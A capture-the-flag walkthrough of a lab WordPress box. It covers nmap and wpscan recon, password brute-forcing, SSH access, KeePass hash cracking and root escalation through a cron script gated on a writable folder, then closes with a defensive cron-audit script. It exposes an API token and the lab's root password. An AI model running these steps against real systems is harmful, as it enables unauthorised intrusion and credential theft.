Information gathering
Host discovery with nmap
nmap 192.168.56.0/24
Nmap scan report for 192.168.56.131
Host is up (0.0031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Directory scan with dirb
dirb http://192.168.56.131/
Found the WordPress login page
http://192.168.56.131/wp-login.php
Directory listing is enabled
http://192.168.56.131/wp-includes/
http://192.168.56.131/wp-admin/includes/
http://192.168.56.131/wp-admin/images/
http://192.168.56.131/wp-content/uploads/
...
Enumerate users
wpscan --url http://192.168.56.131/ -e u
Brute-force the password; nothing found
wpscan --url http://192.168.56.131/ -U ~/u.txt -P /usr/share/wordlists/rockyou.txt -t 50
Scan for vulnerabilities; no usable vulnerability
wpscan --url http://192.168.56.131/ --api-token H3WNWY5YnLBhWcQtyQ2cP6IyVOhWiwAIsJH7F1WxBfc -e vp,vt,tt
Generate a wordlist from the site
cewl -m 5 -w pass.txt 192.168.56.131
Brute-force the user passwords again
wpscan --url http://192.168.56.131/ -U ../u.txt -P pass.txt
Login succeeded, but the user has low privileges
Only after reading a writeup did I learn that http://192.168.56.131/wp-content/uploads/2021/02/dblogo.png
has the SSH password hidden in it via steganography
Getting a shell
Testing each user in turn, the password belongs to the user gill; log in over SSH
ssh gill@192.168.56.131
Privilege escalation
Check the system version and look up exploits for that version
uname -a
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
No kernel privilege-escalation exploit
searchsploit -s 'debian 4.19'
Exploits: No Results
Shellcodes: No Results
Upload and run the linpeas.sh script; it finds the keyfolder directory
Tool: https://linpeas.sh
Upload and run pspy to monitor scheduled tasks; key.sh runs every minute
scp ./Desktop/pspy64 gill@192.168.56.131:/home/gill
Tool: https://github.com/DominicBreuker/pspy
Download keyfile.kdbx from the user's home directory; it is a file that stores credentials and is itself password-protected
scp gill@192.168.56.131:/home/gill/keyfile.kdbx ./
Crack the file password from its hash
keepass2john keyfile.kdbx > keyhash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt keyhash.txt
Open the file by importing it into the online site https://app.keeweb.info and entering the password
None of these is the root password
Only after reading a writeup did I learn that a directory or file with one of the following names
has to be created in /keyfolder
2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde
mkdir fracturedocean or touch fracturedocean
After creating the directory named fracturedocean, a rootcreds.txt file appears in the keyfolder directory
Check the file contents: it is the root password
root creds
imjustdrifting31
With root access, look at the contents of key.sh
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
    echo "root creds" >> /keyfolder/rootcreds.txt
    echo "" >> /keyfolder/rootcreds.txt
    echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
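The root of the escalation is in that script, not in any kernel bug: a root cron job takes its branch decision from the contents of /keyfolder, a directory a low-privileged user can write to, and then writes a plaintext password into that same directory. Note also that the gate compares the whole output of ls against one string, so it only fires when fracturedocean is the sole entry in the folder. The following audit script is an added example, not part of the original writeup or the box; it parses a cron script for exactly these two defects (branch conditions that depend on a path, and literal secrets echoed into credential-looking files), checks whether the gating path is world-writable, and runs against a constructed copy of key.sh with the password replaced by a placeholder. The `root` parameter, the regexes and the function names are this example's own assumptions.

```python
import os
import re
import stat
import tempfile

# Constructed sample modelled on the box's key.sh; the password is a labelled placeholder.
SAMPLE_SCRIPT = """#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
    echo "root creds" >> /keyfolder/rootcreds.txt
    echo "" >> /keyfolder/rootcreds.txt
    echo "PLACEHOLDER_PASSWORD" >> /keyfolder/rootcreds.txt
fi
"""

# A branch that depends on a path: $(ls PATH) or a test operator such as -d/-f/-e PATH.
GATE_RE = re.compile(r"\$\(\s*ls\s+(/\S+?)\s*\)|\s-[a-z]\s+(/\S+)")
# A quoted literal echoed (appended or written) into an absolute path.
ECHO_RE = re.compile(r'^\s*echo\s+"([^"]*)"\s*>>?\s*(/\S+)')
# File names that suggest the target holds a secret.
SECRET_NAME_RE = re.compile(r"cred|pass|secret|key|token", re.I)


def gate_paths(script):
    """Absolute paths whose state decides a branch in the script, in order of appearance."""
    found = []
    for m in GATE_RE.finditer(script):
        path = m.group(1) or m.group(2)
        if path not in found:
            found.append(path)
    return found


def write_targets(script):
    """Absolute paths the script echoes literals into, in order of appearance."""
    targets = []
    for line in script.splitlines():
        m = ECHO_RE.match(line)
        if m and m.group(2) not in targets:
            targets.append(m.group(2))
    return targets


def secret_lines(script):
    """1-based line numbers that echo a non-empty literal into a credential-looking file."""
    hits = []
    for n, line in enumerate(script.splitlines(), 1):
        m = ECHO_RE.match(line)
        if m and m.group(1).strip() and SECRET_NAME_RE.search(os.path.basename(m.group(2))):
            hits.append(n)
    return hits


def is_world_writable(path, root="/"):
    """True if PATH (resolved under ROOT) has the other-write bit; None if it does not exist."""
    real = os.path.join(root, path.lstrip("/"))
    try:
        return bool(os.stat(real).st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return None


def audit(script, root="/"):
    """Summarise the risky constructs in one cron script."""
    gates = gate_paths(script)
    return {
        "gate_paths": gates,
        "world_writable_gates": [p for p in gates if is_world_writable(p, root)],
        "write_targets": write_targets(script),
        "secret_lines": secret_lines(script),
    }


def demo_audit_in_sandbox():
    """Recreate the box's world-writable /keyfolder under a temp dir and audit the sample."""
    root = tempfile.mkdtemp()
    keyfolder = os.path.join(root, "keyfolder")
    os.mkdir(keyfolder)
    os.chmod(keyfolder, 0o777)  # the misconfiguration: any user can add entries root acts on
    return audit(SAMPLE_SCRIPT, root=root)


if __name__ == "__main__":
    for name, value in demo_audit_in_sandbox().items():
        print(f"{name}: {value}")
```

Run it against real cron entries by reading each script under /etc/cron.d or from root's crontab and calling audit() with the default root. A gate path that is world-writable, or a secret line at all, is a finding: the fix on this box would be to stop a root job from branching on user-controlled directory contents and to never emit credentials into a world-readable file.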